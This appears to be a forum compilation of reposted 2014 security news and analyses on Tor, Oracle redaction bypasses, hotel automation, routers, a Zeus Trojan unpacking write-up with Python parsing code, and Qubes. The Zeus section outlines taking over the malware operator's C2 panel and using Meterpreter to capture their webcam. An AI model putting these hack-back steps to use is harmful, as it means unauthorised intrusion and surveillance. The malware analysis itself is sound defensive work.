The presence of an unknown flaw in one of these components could allow a compromise of the entire architecture. Attackers know this, and they are concentrating all their effort on discovering such flaws … but if you are a researcher, do not forget that every day anonymizing networks allow many individuals to avoid censorship and monitoring operated by authoritarian regimes.

References
http://securityaffairs.co/wordpress/26395/hacking/tor-network-broken.html
http://securityaffairs.co/wordpress/26982/hacking/tor-working-fix-flaw.html
http://securityaffairs.co/wordpress/27019/hacking/russian-government-crack-tor.html
http://www.theregister.co.uk/2014/07/25/putin_crack_tor_for_me_and_ill_make_you_a_millionaire/
http://securityaffairs.co/wordpress/27193/hacking/attacks-against-tor-network.html
http://securityaffairs.co/wordpress/5650/cyber-crime/what-is-the-deep-web-a-first-trip-into-the-abyss.html
https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack
http://www.cs.kau.se/philwint/spoiled_onions/techreport.pdf
http://securityaffairs.co/wordpress/18397/hacking/tor-anonymity-tor-stinks.html
http://www.bbc.com/news/technology-28573625
http://www.wired.com/2013/09/freedom-hosting-fbi/all/1
http://securityaffairs.co/wordpress/21535/cyber-crime/russia-spying-tor-network-exit-nodes.html
http://securityaffairs.co/wordpress/26335/intelligence/xkeyscore-hit-tor-authority-server.html
https://blog.torproject.org/blog/one-cell-enough

By Pierluigi Paganini | August 6th, 2014

Sursa: Hacking Tor and Online Anonymity - InfoSec Institute
-
Oracle Database Redaction ‘Trivial to Bypass’
by Dennis Fisher

LAS VEGAS–David Litchfield for many years was one of the top bug hunters in the game and specialized in causing large-scale headaches for Oracle. When he decided to retire and go scuba diving, there likely were few tears shed in Redwood City. Litchfield recently decided to resurface, which is good news for the security community and users but may not cause a celebration among Oracle engineers.

There were few more proficient vulnerability finders during the 2000s than Litchfield, a self-taught researcher who found dozens and dozens of critical flaws in products up and down the Oracle catalog. While many of his peers focused on browsers and Web servers, Litchfield specialized in digging into the guts of Oracle’s database products and breaking them in new and creative ways. In the days when Oracle touted its security as Unbreakable, Litchfield made a habit of proving otherwise.

Recently, he decided to take up the task again. After taking a long break from security research and spending a lot of time in close proximity to great white sharks, Litchfield began looking at Oracle’s security again, specifically a new data redaction service the company added in Oracle 12c. The service is designed to allow administrators to mask sensitive data, such as credit card numbers or health information, during certain operations. But when Litchfield took a close look he found a slew of trivially exploitable vulnerabilities.

“It’s a great idea. The problem is, of course, it’s trivial to bypass,” he said during a talk at the Black Hat USA conference here Wednesday. “If Oracle had followed any sort of SDLC instead of just paying lip service to it, every one of these flaws would’ve been caught.
It’s kindergarten stuff.”

Litchfield found several methods for bypassing the data redaction service and tricking the system into returning data that should be masked. “The first method uses the RETURNING INTO clause with INSERT, UPDATE and DELETE operations. The RETURNING INTO clause allows data to be returned into a variable after a DML operation. This can be used to bypass Oracle data redaction,” he wrote in a paper outlining the flaws.

A second method he found is essentially a brute force attack on the data in a redacted column in a database. “Another way to gain access to the data is with an iterative inference attack. It is possible to access data in a SELECT’s WHERE clause. This gives an attacker the opportunity to essentially guess or brute-force the data in a redacted column using a WHERE data LIKE predicate. Consider the following PL/SQL procedure. This simply tests the value of a given character at a given offset into the string. When it gets the first character correct it moves on to the next character and so on until all 16 characters of the credit card have been ascertained,” he said in the paper.

Litchfield said that the methods he found were so simple he doesn’t even feel right calling them exploits. “There are issues that are trivial to find. They’re still not learning the lessons that people were learning in 2003,” he said. “It’s 2014 and yet I’m still able to sit down and in the space of a few minutes find a bunch of things that I can send to Oracle as exploitable.”

The data redaction bypasses that Litchfield found have been patched, but he said he recently sent Oracle a critical flaw that enables a user to gain control of the database. That flaw isn’t patched yet but is in the pipeline.

Sursa: Oracle Database Redaction 'Trivial to Bypass' | Threatpost | The first stop for security news
-
CROSS SITE PRINTING
Printer Spamming

INTRODUCTION AND BACKGROUND

Many network printers listen on port 9100 for a print job (RAW Printing or Direct IP printing). You can telnet directly to the printer port and enter text. Once you disconnect from the printer it will print out the text that you sent it. Network printers also accept PostScript and Printer Control Language. The security around this is usually minimal – connect to the port, send the print job, disconnect and the printer prints the page.

Within the last year there have been new discoveries on attacking the Intranet from the Internet. This involves setting an image tag or script tag to an internally addressable IP address, and then the browser will request the “image” resource. Several attacks can be accomplished: port scanning, fingerprinting devices, and changing internal router settings.

Download: https://sites.google.com/site/aaronweaver2/CrossSitePrinting.pdf?attredirects=0
-
Hacking Expert 'Took Control Of 200 Hotel Rooms' A security consultant gains control of the lights, blinds and temperature systems of 200 luxury hotel rooms in China. A computer expert took control of 200 luxury hotel rooms after spotting a security flaw in his complimentary in-room iPad. Security consultant Jesus Molina was staying in the five-star St Regis hotel in the Chinese city of Shenzhen, when he said he got bored one evening. He started to play around with the in-room iPad and reverse-engineered an insecure home automation protocol called KNX/IP. By doing so, he was able to control lights, blinds, temperature and other things in his room. He discovered that by changing the last digit of the device's IP address he could take over other devices elsewhere in the hotel. Following that discovery, Mr Molina mapped out the IP addresses for rooms in the rest of the hotel using a computer script he had written. Speaking at the Black Hat hacking conference in Las Vegas, he said: "I thought about looking to see if a similar system controlled the door locks but got scared." After the discovery, he got in touch with the hotel's parent company to highlight the flaw. It is understood that the loophole has now been closed. He told the audience at his talk - called Learn How To Control Every Room At A Luxury Hotel Remotely - that he "did not hack" the system. Instead he said he simply "abused" the KNX protocol, which was created back in the early 90s. Sursa: Hacking Expert 'Took Control Of 200 Hotel Rooms'
-
Security expert calls home routers a clear and present danger
In Black Hat Q&A, In-Q-Tel CISO says home routers are "critical infrastructure."
by Sean Gallagher - Aug 7 2014, 4:12am GTBST

LAS VEGAS—During his keynote and a press conference that followed here at the Black Hat information security conference, In-Q-Tel Chief Information Security Officer Dan Geer expressed concern about the growing threat of botnets powered by home and small office routers. The inexpensive Wi-Fi routers commonly used for home Internet access—which are rarely patched by their owners—are an easy target for hackers, Geer said, and could be used to construct a botnet that "could probably take down the Internet." Asked by Ars if he considered home routers to be the equivalent of critical infrastructure as a security priority, he answered in the affirmative.

Geer spoke about the threat posed by home routers in advance of "SOHOpelessly Broken," a router hacking contest scheduled for the DEF CON security conference later this week sponsored by the Electronic Frontier Foundation. "Because they are so cheap, you can get a low-end router for less than 20 bucks that hasn't been updated in a while," Geer explained. Attackers could identify vulnerabilities in particular models and then scan the Internet for targets based on the routers' signatures. "They can then build botnets on the exterior of the network—the routing that it does is only on the side facing ISPs," he said. "If I can build a botnet on the outside of the routers, I could probably take down the Internet."

During his keynote, Geer had said that inexpensive routers were an example of the security risk of the "Internet of Things," because of their use of long-lived embedded software with no automatic way for vendors to distribute patches. "All embedded software should either have a remote management interface, or they need a finite lifetime," he opined, "because if they live long enough, something bad will happen.
If a person lives long enough, they will get dementia—if a piece of software lives long enough, it will be taken over." In response to a question during the following press conference, Geer admitted that remote management software for routers was a potential security risk in itself. "But absent that, there's a different set of risks," he added. By using "fuzzing"—sending bogus data to a device to try to cause a failure—Geer said that attackers could essentially discover "an unintended remote management interface. Unless you adopt [interface] strictures, it's very difficult to defend against bad inputs." Sursa: Security expert calls home routers a clear and present danger | Ars Technica
-
How to bypass Zeus Trojan’s self protection mechanism

Spammers are good when it comes to intimidating users into opening the attachment. One of the recent pathetic and cruel ones was:

Hi
A Person from your office was found dead outside. Please open the picture to see if you know him.
Regards

The attachment is basically a Zip file consisting of an exe file named “image.scr” with a nice mspaint icon. Quickly opening it up in IDA will give us a hint that it is basically a VB packer. VB packers usually create a hollow suspended process, overwrite the memory and resume it. After successfully unpacking and fixing the dump we get the following output. The OEP of the unpacked binary is enough to tell us that it is a Zeus banking Trojan.

Well, this one is a different version of Zeus with self-protection, which means unpacked ones won't run. This is usually done to “force” the bot masters to buy a cryptor service. If you double click the binary it will not run; it will simply exit. Now let's see where things are going wrong and how to bypass the protection. For that purpose we will generate an API call graph of the unpacked binary to see the exit point of the program. From this we get an idea that it is reading a file buffer and performing some operations on it; now let's see what operation it is performing. If we dig deeper we find out that the file buffer is read and then some cryptographic operations are performed. And if we go inside the CheckSelfProtection() function we will observe that this function RC4s the whole binary buffer with a static encryption key and searches for the placeholder “DAVE”. In my case the RC4 key was

Packer integrity

We can copy that 0x200 byte data from the packer into the overlay of our unpacked file. If found, it goes further on verifying the integrity of that data structure and decodes another payload using a 4 byte XOR key taken from that structure.
The total size of the data structure is 0x200 bytes and, on the basis of the size, installer and injector are decrypted. Let's now understand the structure of that 0x200 byte data structure. During the installation phase iSizeOfPacket bytes are copied from the data chunk into the heap and then later used to decode the installer subroutine using a XOR cipher.

struct Zeus_packer_overlay {
    DWORD SIGNATURE;
    SetBackColor( cRed );
    DWORD Crc32HASH;
    SetBackColor( cBlue );
    WORD iSizeOfPacket;
    unsigned int SizeOfDecodedData;
    unsigned int Unknown1;
    SetBackColor( cRed );
    unsigned int XorKey;
} Zeus_Packer_OverLay;

Before decoding the installer routine the CRC32 hash is checked and SizeOfDecodedData bytes are copied to a heap location in this function. The installer and injector are differentiated by the iSizeOfPacket field: if the size is 0x0c then it is still in the installation phase; if it is 0x1e6 then it has been replaced by the installation routine with a new packer data structure. The installation subroutine is then decoded using XorKey with a data buffer of size SizeOfDecodedData using this simple XOR function.

During the installation phase the packer data structure is rewritten and encrypted using RC4, resulting in data of length 0x1e6 which mainly consists of installation data like:
1 : Registry Keys
2 : Random Numbers Generated for Seeding
3 : Local Path Name
4 : Computer Name and Version

Replacing this packer overlay data with the old one will let you skip the installation phase and the binary won't be relaunched again using CreateProcessA in %appdata%. Yet we will have to patch a jump after it compares its path in the overlay data with the current path.

Owning a Zeus C2C panel / Spammer

There exists a publicly known RCE vulnerability in some versions of Zeus (as well as Zeus lite, KINS, ICE-IX), as described in detail here (Billy (BK) Rios » Turning the Tables – Part I).
Our good friend Xylitol has already provided a ready to use tool to exploit such a vulnerability: CyberCrime. All we need for that is the C2C web address and the RC4 communication key. Both of them you can get from the base config decoding subroutine, which is again based on a simple XOR cipher. After getting the C2C and RC4 key, it can be submitted here to get a shell on that C2C web panel. Once you get the shell you can then edit cp.php (the login file for the Zeus panel) and boost up your Metasploit exploit after the bot master has logged in. And if you know how to proceed further, you can get a meterpreter shell on the spammer's machine. webcam_snap is one beautiful Meterpreter script command which I personally like (http://www.offensive-security.com/metasploit-unleashed/Meterpreter_Basics#webcam_snap). It takes a webcam capture from the victim's computer and saves it on the target machine. And if you enter that, you might get back something like this on your computer.

Sursa: How to bypass Zeus Trojan’s self protection mechanism
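As an added example (not code from the post above or from the Zeus sample itself), here is the self-protection check and overlay walk described in the post in Python, as an analyst would script it: RC4 the file with the static key, locate the “DAVE” placeholder, parse the 0x200-byte packer structure, verify the CRC32 and XOR-decode the payload. The packed 22-byte field layout, the assumption that the CRC32 covers the encoded payload that follows the header, the repeating 4-byte little-endian XOR keystream, and the sample keys and payload are all assumptions, constructed for the example.

```python
import struct
import zlib

OVERLAY_SIZE = 0x200        # total size of the packer data structure (from the post)
SIGNATURE = b"DAVE"         # placeholder CheckSelfProtection() searches for (from the post)
# Assumed packed layout of the struct shown in the post (no alignment padding):
# DWORD SIGNATURE, DWORD Crc32HASH, WORD iSizeOfPacket, UINT SizeOfDecodedData,
# UINT Unknown1, UINT XorKey
HEADER_FMT = "<4sIHIII"
HEADER_LEN = struct.calcsize(HEADER_FMT)   # 22 bytes


def rc4(key, data):
    """Plain RC4 (KSA + PRGA); symmetric, so it both encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_decode(data, key):
    """XOR with a repeating 4-byte little-endian key (keystream rule is an assumption)."""
    ks = struct.pack("<I", key)
    return bytes(b ^ ks[i % 4] for i, b in enumerate(data))


def locate_overlay(file_bytes, rc4_key):
    """Mimic CheckSelfProtection(): RC4 the whole buffer with the static key and
    search the result for the DAVE placeholder. Returns the 0x200-byte overlay or None."""
    decrypted = rc4(rc4_key, file_bytes)
    off = decrypted.find(SIGNATURE)
    if off < 0 or off + OVERLAY_SIZE > len(decrypted):
        return None
    return decrypted[off:off + OVERLAY_SIZE]


def parse_overlay(overlay):
    """Unpack the header fields; raises if the placeholder is missing."""
    sig, crc, size_pkt, size_dec, unknown1, xor_key = struct.unpack_from(HEADER_FMT, overlay, 0)
    if sig != SIGNATURE:
        raise ValueError("DAVE placeholder not found at overlay start")
    return {"crc32": crc, "size_of_packet": size_pkt, "size_of_decoded": size_dec,
            "unknown1": unknown1, "xor_key": xor_key}


def phase(hdr):
    """Installer vs. installed is told apart by iSizeOfPacket (values from the post)."""
    return {0x0C: "installation", 0x1E6: "installed"}.get(hdr["size_of_packet"], "unknown")


def decode_payload(overlay):
    """Verify the CRC32, then XOR-decode SizeOfDecodedData bytes following the header.
    Assumption: the encoded payload sits right after the header and the CRC covers it."""
    hdr = parse_overlay(overlay)
    end = HEADER_LEN + hdr["size_of_decoded"]
    if end > len(overlay):
        raise ValueError("SizeOfDecodedData exceeds the overlay")
    encoded = overlay[HEADER_LEN:end]
    if zlib.crc32(encoded) & 0xFFFFFFFF != hdr["crc32"]:
        raise ValueError("CRC32 mismatch: overlay tampered with or mis-parsed")
    return hdr, xor_decode(encoded, hdr["xor_key"])


def build_sample(plaintext, xor_key, rc4_key, size_pkt=0x0C, prefix=b"MZ" + b"\x90" * 30):
    """Constructed fixture (not real malware data): an overlay appended to a fake PE
    stub, then RC4-encrypted with the static key so locate_overlay() has to undo it."""
    encoded = xor_decode(plaintext, xor_key)          # XOR is its own inverse
    header = struct.pack(HEADER_FMT, SIGNATURE, zlib.crc32(encoded) & 0xFFFFFFFF,
                         size_pkt, len(encoded), 0, xor_key)
    overlay = (header + encoded).ljust(OVERLAY_SIZE, b"\x00")
    return rc4(rc4_key, prefix + overlay)
```

A tampered byte anywhere in the encoded payload trips the CRC32 check, which is the integrity step the post says the binary performs before decoding the installer.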
-
[h=1]Qubes 2 RC2 Is Probably the Most Secure Operating System in Existence – Gallery[/h]
August 7th, 2014, 07:17 GMT · By Silviu Stahie

Qubes, an open source operating system designed to provide strong security for desktop computing, which is based on Xen, the X Window System, and Linux and can run most Linux applications and utilize most of the Linux drivers, is now at version 2 RC2 and it's ready for testing.

The Qubes distribution was built as a virtual stronghold and it should be one of the most secure operating systems available right now. It's not a Linux distribution for beginners and it requires users to get informed before using it, but it's all worth it once you understand how it actually works.

The Qubes releases don't happen very often. In fact, the previous RC in the series was made available back in April and the development of the new branch actually started in 2013.

“Today we're releasing the second release candidate (rc2) for Qubes OS R2. There are currently no more open tickets for the final R2 release, and we hope that what we release today is stable enough and so will be identical, or nearly identical, to the final R2 ISO, which we plan to release after the summer holidays.”

“After the Qubes rc1 release a few months ago we have been hit by a number of problems related to unreliable VM start-ups. The most prevalent problem has been traced down to an upstream bug in systemd, which just happened to be manifesting on Qubes OS due to specific conditions imposed by our startup scripts,” note the developers.

The devs are also working on a Debian template for Qubes AppVMs, which can be installed with a simple command. It features GUI virtualization, secure clipboard, secure file copy, and other integration features, all of them working out of the box.
Also, a “minimal” Fedora-based template can now be found in the Templates Appstore, the Wiki server has been moved to a bigger EC2 instance, and a number of themes for the installer and plymouth have been provided by default.

Keep in mind that, unlike the rest of Qubes, which is distributed under a GPL v2 license, the Qubes Windows Support Tools are not open sourced and are distributed as binaries only, under a proprietary license.

Check out the official announcement for a complete list of updates and upgrade instructions. You can download Qubes 2 RC 2 right now from Softpedia. Remember that this is a development version and it should NOT be installed on production machines. It is intended for testing purposes only.

[h=2]QUBES 2 RC2 - PHOTO GALLERY:[/h]

Sursa: Qubes 2 RC2 Is Probably the Most Secure Operating System in Existence – Gallery